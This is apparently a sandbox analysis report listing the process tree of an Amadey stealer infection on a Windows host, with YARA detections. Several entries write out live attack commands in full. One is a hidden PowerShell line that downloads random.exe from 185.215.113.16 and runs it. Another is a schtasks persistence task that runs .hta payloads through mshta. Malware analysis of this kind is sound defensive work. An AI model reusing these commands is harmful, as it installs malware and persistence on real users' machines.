Target ID:	1
Start time:	04:07:11
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x7f0000
File size:	3'312'128 bytes
MD5 hash:	7638E458B00BE1A00936AB9419267621
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:07:12
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x7f0000
File size:	3'312'128 bytes
MD5 hash:	7638E458B00BE1A00936AB9419267621
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:08:00
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x7f0000
File size:	3'312'128 bytes
MD5 hash:	7638E458B00BE1A00936AB9419267621
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Imagebase:	0x400000
File size:	93'696 bytes
MD5 hash:	4D140076DE73C646ABAC6DF1FE85851C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Imagebase:	0x400000
File size:	93'696 bytes
MD5 hash:	4D140076DE73C646ABAC6DF1FE85851C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7B1F.tmp\7B20.tmp\7B21.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:08:08
Start date:	07/01/2025
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 2
Imagebase:	0x7ff656790000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:08:10
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:08:10
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:08:11
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:08:11
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:08:11
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:08:11
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:08:11
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:08:11
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x100000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:08:12
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 7224, Parent PID: 7212

General

Target ID:	24
Start time:	04:08:13
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7252, Parent PID: 1848

General

Target ID:	25
Start time:	04:08:13
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:08:13
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x100000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:08:14
Start date:	07/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "C:\Temp\.hta"
Imagebase:	0x7ff7b9d50000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:08:14
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /tn "AutoRunHTA" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:08:14
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:08:14
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta "C:\Temp\.hta"
Imagebase:	0x20000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:08:14
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /delete /tn "AutoRunHTA" /f
Imagebase:	0xb30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:08:15
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:08:15
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	04:08:15
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:	0x100000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	04:08:15
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:08:15
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Imagebase:	0xb30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:08:15
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	04:08:15
Start date:	07/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	04:08:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:08:17
Start date:	07/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "C:\Temp\\random.hta"
Imagebase:	0x7ff7b9d50000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	04:08:17
Start date:	07/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "C:\Temp\\random.hta"
Imagebase:	0x7ff7b9d50000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Imagebase:	0x400000
File size:	93'696 bytes
MD5 hash:	4D140076DE73C646ABAC6DF1FE85851C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 648, Parent PID: 1516

General

Target ID:	44
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A6C3.tmp\A6C4.tmp\A6C5.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5816, Parent PID: 4180

General

Target ID:	48
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	04:08:19
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Imagebase:	0x400000
File size:	93'696 bytes
MD5 hash:	4D140076DE73C646ABAC6DF1FE85851C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	04:08:20
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A859.tmp\A85A.tmp\A85B.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	04:08:20
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 3104, Parent PID: 2504

General

Target ID:	53
Start time:	04:08:20
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	04:08:21
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 3384, Parent PID: 5416

General

Target ID:	55
Start time:	04:08:21
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: 483d2fa8a0d53818306efeb32d3.exePID: 6448, Parent PID: 7432

General

Target ID:	56
Start time:	04:08:22
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Imagebase:	0x80000
File size:	3'231'232 bytes
MD5 hash:	2314D4E1D1134D797121BF79B03C2A4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	04:08:23
Start date:	07/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "C:\Temp\.hta"
Imagebase:	0x7ff7b9d50000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	04:08:23
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /tn "AutoRunHTA" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	04:08:23
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	04:08:23
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	04:08:23
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
